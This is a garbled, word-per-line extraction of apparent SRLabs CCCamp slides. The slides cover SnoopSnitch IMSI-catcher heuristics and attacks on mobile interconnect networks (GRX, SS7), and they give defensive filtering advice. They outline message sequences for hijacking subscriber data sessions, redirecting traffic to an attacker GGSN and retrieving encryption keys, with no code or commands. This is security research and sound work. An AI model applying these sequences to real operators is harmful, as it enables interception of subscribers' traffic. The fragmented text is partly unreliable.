CCCamp SRLabs Advanced Interconnect Attacks.v1
CCCamp SRLabs Advanced Interconnect Attacks.v1
CCCamp SRLabs Advanced Interconnect Attacks.v1
interconnect
attacks
Chasing
GRX
and
SS7
vulns
Karsten
Nohl <[email protected]>
Luca
Melette <[email protected]>
SRLabs Template v 12
Agenda
2G
2G
1,000
100
10
3G
GSMmap-apk
released
2014-03
Snoop-
Snitch
-06
-09
-12
4G
2015-03
-06
2015
3
No proper neighbors
Suspicious
cell
configuration
B
Suspicious
cell
behavior
Lack
of
proper
encryption
No
encryption
-or-
Downgrade
to
crackable A5/1
or
A5/2
Delayed
Cipher
Mode
Complete
(due
to
A5/1
cracking
time)
SnoopSnitch
assigns
a
score
to
each
heuristic1 and
sums
scores
to
form
catcher
events
75%
50%
Near-certain
catcher
sightings.
Several
heuristics
triggered
(3%)
25%
0%
2.7
3.5
7
5
Config
Behavior
454
12
13
77
60
21
19
No neighbors [K1]
356
C Encryption
9
6
No
proper
neighbors
Suspicious
cell
Lonesome
location
area
configuration
Out-of-place
location
area
1. Networks
often
change
abruptly;
e.g.
when
entering
the
subway
False
positive
2. SnoopSnitch
cannot
directly
read
the
radio
channel
(ARFCN)
from
the
baseband.
In
the
few
cases
its
heuristic
guesses
wrong,
an
causes
IMSI
catcher
event
is
reported
Suspicious
cell
behaviour
False
positive
causes
False
positive
causes
/3 /3 /1
/3
2. Can
IMSI
catchers
really
not
use
A5/3
and
other
strong
crypto?
We
are
about
to
find
out!
Spot the difference: Not all catcher events are being uploaded
Agenda
11
The
GRX
network
connects
nodes
along
the
Internet
access
path
of
mobile
phones
GGSN
RNC
SGSN
Internet
GRX
GGSN
DNS
Phone
configures
an
APN
The
APNs
DNS
entry
determines
which
GGSN
is
used
GGSN
typically
stays
the
same
even
when
roaming
PDP
Context
Collection
of
identifiers
needed
for
data
flow,
including:
TEID,
TEID
12
Fraud
->
P1Sec
@
HITB
MITM
Local intercept
Hijacking
DoS
Research
question:
What
can
attackers
do
on
GRX?
SGSN
GRX
Attacker
GGSN
Focus
of
this
talk
Attacker
needs
1. GRX
connectivity?
Not
always!
Prerequisites:
(discussed
herein)
SGSN
reachability
and
IMSI
2. IP
of
current
SGSN.
3. Subscriber
IMSI.
Query
through:
Several
methods
exist
for
IMSI
extraction
a.SRI-GPRS over
SS7
a. Various
SS7
/
HLR
queries
b.SRI-GPRS over
GRX
b. IMSI
catching
c. Send
SGSN-
ContextRequest
c. Passive
sniffing
to
all
possible
SGSNs;
d. Guessing
from
IMSI
range
one
will
respond
(non-targeted)
13
SGSN
CreatePDP: TEID
GGSN
TEID
UpdatePDP(TEID)
sets
new
GGSN
IP
SGSN
Attacker
14
SGSN
3.UpdatePDP(TEID)
to set
new
GGSN
IP
GGSN
1.SGSNContext-
Req(IMSI)
2.UpdatePDP
(TEID)
TEID, GGSN IP
Catch
1
Still
dont
know
TEID
Partial
solution
Entropy
bugs
in
some
SGSNs:
TEID =
86093C47
TEID =
86498247
GGSN
SGSN
Attacker
15
GTP control
SGSN
GGSN
2. Context Ack
1.SGSNContextReq
SGSN
Attacker
16
RNC
SGSN
2.Forward
RelocationReq
(Radio Msg,
Context)
RNC
1.SGSNContextReq
Context
SGSN
Attacker
17
2.ActivatePDP
3.
Accept
Catch
The
phone
must
be
registered
to
the
network
but
with
no
data
connection
established.
Since
newer
phones
always
try
to
maintain
a
data
connection,
they
seem
to
not
support
this
mechanism,
and
reject
SGSN
1.PDUNotificationReq
(IMSI, APN, IP)
This
message
is
used
when
data
is
received
for
a
non-connected
phone.
It
establishes
a
new
connection
GGSN
Attacker
18
DNS
2. Phone
reconnects
(immediately)
1.InsertSubscriber-
Data(Camel server)
cancels
data
connection
4. Looks
up
GGSN
IP
as
apn.mcc.mnc.gprs
OI
SGSN
3. Sends
APN
to
Camel
server
for
verification
5.Connects
to
attacker
GGSN
Corrected
APN
Catch
3
Requires
Camel
v3,
which
only
minority
of
operators
supports
as
of
now
SS7
STP
Camel
server
Attacker
GGSN
Catch
IMSI
NanoBTS or
any
other
small
cell
Demo
Request
auth/encryption
keys
over
GRX
or
SS7
GRX:
SGSNContextReq
SS7:
SendAuthInfo or
SendIdentification
Usually
possible
over
GRX
or
SS7
connection
Also
possible
over
the
Internet?
(next
chapter)
20
Agenda
21
22
Brazil
Tim
China
China
Mobile
Guangdong
Mobile
Shanghai
Mobile
Korea
SK
Telecom
Korea
Telecom
Colombia
Colombia
Mvil
USA
NewCore Wireless
Union
Cell
Globecomm
271k
302k
826
580
GTP
endpoints
267
267
153
76
65
12
58
54
4
47
47
10
8
1
1
SGSNs
disclose
current
encryption
key
on
the
Internet!
24
Layer 2 parsing
Layer 3 parsing
GPRSdecode:
srlabs.de/gprs
Wireshark:
2G
Query
current
key
2G
&
3G
GRX:
SGSNContextReq
Or
even
over
the
Internet!
25
Demo
Misuse subscriber IP
GRX:
SGSNContextReq
GRX: UpdatePDP
26
From
non-
roaming
partner
IP
Over
GRX
or
SS7
Spoof
roaming
partner
IP
Be
roaming
partner
Necessary
filter
Never
expose
GRX/SS7
on
the
Internet
Never talk
to
non-
roaming
partners
Prevelance
Most
networks
have
this
filter,
but
not
all
Some
networks
distinguish
roaming
partners,
many
dont
Filter
by
GT
(SS7)
or
IP
(GRX)
Velocity
checks:
Can
a
subscriber
possibly
have
moved
into
the
new
network?
27
Agenda
28
Mobile
intrusion
detection
system
Meant
for
you
to
keep
a
SnoopSnitch
phone
running
at
home
to
spot
changes/anomalies
29
Live
export
of
2G,
3G,
4G
traces
30
Tools.
OsmocomBB? rad1o?
Results.
31
Take aways.
Next events.
Mobile
security
SnoopSnitch
data
workshop
Day
3,
17:00
Berlin
village
Other
SRLabs
Fuzzing
with
AFL
Day
2;
16:00
Hackcenter
1
Questions?
Biometrics
hacks
Day
3;
14:30
Hardware
Hacking
area
Hardware
hack
playground
All
camp
long
SRLabs
camper